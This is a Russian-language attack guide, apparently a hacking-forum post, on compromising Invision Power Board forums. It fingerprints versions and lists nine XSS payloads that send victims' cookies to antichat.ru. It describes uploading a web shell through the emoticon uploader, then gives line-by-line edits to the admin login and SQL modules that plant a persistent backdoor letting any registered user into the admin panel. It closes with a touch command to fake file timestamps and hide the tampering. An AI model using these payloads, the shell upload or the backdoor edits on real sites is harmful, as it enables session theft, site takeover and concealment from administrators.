Версия Invision Power Board 1.3

Опредиляем, если существует следующие папки и файлы:

/html/emoticons/

/fonts/

/Skin/

/ssi_templates/

ssi.php

show.php

css.php

conf_mime_types.php

Версия Invision Power Board 2.0.*

Опредиляем, если существует следующие папки и файлы:

/sources/help.php

/sources/usercp.php

/sources/trial_functions.php

/sources/topics.php

/sources/taskloader.php

реагирует на 403 "доступ запрещен" например к папке

/ips_kernel/ как 403: Invision Power Board -> Forbidden

Версия Invision Power Board 2.1.*
Опредиляем, если существует следующие папки и файлы:

/ips_kernel/PEAR/

присутствует файлы:

info.php

реагирует на 403 "доступ запрещен" например к папке

/ips_kernel/ как 403: IBForums-> Forbidden

Exploits

Версия Invision Power Board 1.3.1 //перейти
Версия Invision Power Board 1.* , 2.* (<2.0.4) //перейти
Версия Invision Power Board 2.0.0 - 2.0.2 //перейти
Версия Invision Power Board Army System Mod 2.1 //перейти
Версия Invision Power Board 2.1.4 (Dos) //перейти
Версия Invision Power Board <=2.1.5 (Remote code execution)
//перейти

XSS коды:

<br /> [email]wj@wj[url=http://www.wj.com`=`][/url].com[/email] ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);`
<br /> [HTML][EMAIL][URL=wj`=`][/URL][/EMAIL][/color][color=white]` style=`background:url(javascript:document.images [1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)`[/color]
<br /> [EMAIL]mail@mail.com[URL=target/style=background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie); ][/URL][/EMAIL]
<br /> [post=1000[topic=target style=background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);][/topic]][/post]
<br /> [email]wj@wj.com[/email] ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);`
<br /> [COLOR=[IМG]http://aaa.aa/=`aaa.jpg[/IMG]]` style=background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)
<br /> [еmail]wj@wj.com[/email] ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);`
<br /> [EMAIL][URL=wj`=`][/URL][/EMAIL]]` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)`
<br /> [HTML][color=white][EMAIL][URL=wj`=`][/URL][/EMAIL][/color]` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)`

Invision Power Board 1.3

"Administration(Администрирование)"->"Manage Emoticons(Управление смайлами)"->"Upload an Emoticon to the emoticons directory(Загрузить смайл в его директорию)"->"Browse(Обзор)"

Обычно шелл грузица в одну из этих папок,в зависимости от версии,если конечно прав хватает :)

1.3 /forum/html/emoticons/shell.php

2.* /forum/style_emoticons/default/shell.php

где shell.php имя вашего загруженного шелла.

Invision Power Board 2.0.*

Троянизация форума

А теперь представим такую ситуацию, что ты месяц ломал форум, залил шелл, и бац, его удалили =)печально, конечно, да! Для этого мы будем "троянить" форум ,т.е. изменять исходный код форума на тот который сделает нас админом, даже если мы им не являемся. Т.е. любой рарегестрированный пользователь сможет стать админом, но в админцентре, что ты админ не будет отображаться И врядли админы будут смотреть исходники страниц, т.е. твой "троян" будет еще долгое время висеть на форуме чуешь? итак начнем.
ищем такие строки (по дефолту 382 строчка)

Invision Power Board 1.3

Код:
<br /> if ($GROUP['g_access_cp'] != 1) <br /> { <br /> do_login("You do not have access to the administrative CP"); <br /> } <br /> else <br /> { <br /> $session_validated = 1; <br /> $this_session = $row; <br /> }
и заменяем на это:

<br /> if ($GROUP['g_access_cp'] != 1 || $GROUP['g_access_cp'] = 1) <br /> { <br /> $session_validated = 1; <br /> $this_session = $row; <br /> }

и ищим строчки (по дефолту 442 строчка)

kод:

<br /> if ($GROUP['g_access_cp'] != 1) <br /> { <br /> do_login("You do not have access to the administrative CP"); <br /> } <br /> else <br /> { <br /> //---------------------------------- <br /> // All is good, rejoice as we set a <br /> // session for this user <br /> //---------------------------------- <br /> $sess_id = md5( uniqid( microtime() ) );

заменяем соотвественно на это:

<br /> if ($GROUP['g_access_cp'] != 1 || $GROUP['g_access_cp'] = 1) <br /> { <br /> //---------------------------------- <br /> // All is good, rejoice as we set a <br /> // session for this user <br /> //---------------------------------- <br /> $sess_id = md5( uniqid( microtime() ) );

потом редактируем файл /sources/Admin/ad_mysql.php и удаляем строки:

<br /> if ($MEMBER['mgroup'] != $INFO['admin_group']) <br /> { <br /> $ADMIN->error("Sorry, these functions are for the root admin group only"); <br /> }

Invision Power Board 2.0.*

/sources/action_admin/login.php -> по дефолту 147 строчка удаляем строки:

<br /> if ($mem['g_access_cp'] != 1) <br /> { <br /> $this->login_form("You do not have access to the administrative CP"); <br /> } <br /> else <br /> {

и в строке (по дефолту 206) удаляем символ "}" естественно без кавычек.

sql.php по дефолту 46 строка, удаляем:

<br /> if ($this->ipsclass->member['mgroup'] != $this->ipsclass->vars['admin_group']) <br /> { <br /> $this->ipsclass->admin->error("Sorry, these functions are for the root admin group only"); <br /> }

потом следуем сюда -> /sources/lib/admin_functions.php (строка 262), изменяем строку:

<br /> $this->ipsclass->admin_session['_session_validated'] = 0;

меняем на:

<br /> $this->ipsclass->admin_session['_session_validated'] = 1;

потом удаляем строки в файле /sources/sql_mysql.php (по дефолту 76 строка)
<br /> if ($this->ipsclass->member['mgroup'] != $this->ipsclass->vars['admin_group']) <br /> { <br /> $this->ipsclass->admin->error("Sorry, these functions are for the root admin group only"); <br /> }

А терь объясню все поподробней, когда ты заходишь в админку(не "затрояненную"), то идет сначала проверка:
<br /> if($GROUP['g_access_cp'] != 1) имеешь ли ты доступ к админке, если нет { <br /> do_login("You do not have access to the administrative CP"); <br /> }

Для того чтобы нас приняли за своего надо изменить как ты понял эту строку
<br /> if ($GROUP['g_access_cp'] != 1) на if ($GROUP['g_access_cp'] != 1 || $GROUP['g_access_cp'] == 1 )

этим мы ей даем понять, если мы имеем доступ к админке, или не имеем, все равно нас пропустить. Знающие легко переделают код под себя, как им хочеться, впишут что хотят, но т.к. как статья расчитывалась для начинающих, то я думаю, что вам так понятней будет. Ну вот, самые важные аспекты я разобрал. ТОЛЬКО НЕ ЗАБЫВАЕМ ИЗМЕНЯТЬ ДАТУ, командой:

touch -t 200711220122
, где 2007 год 11 месяц 22 число 01:22 часов
советую изначально посмотреть эту дату перед трояниваем, чтобы поставить точно такую же.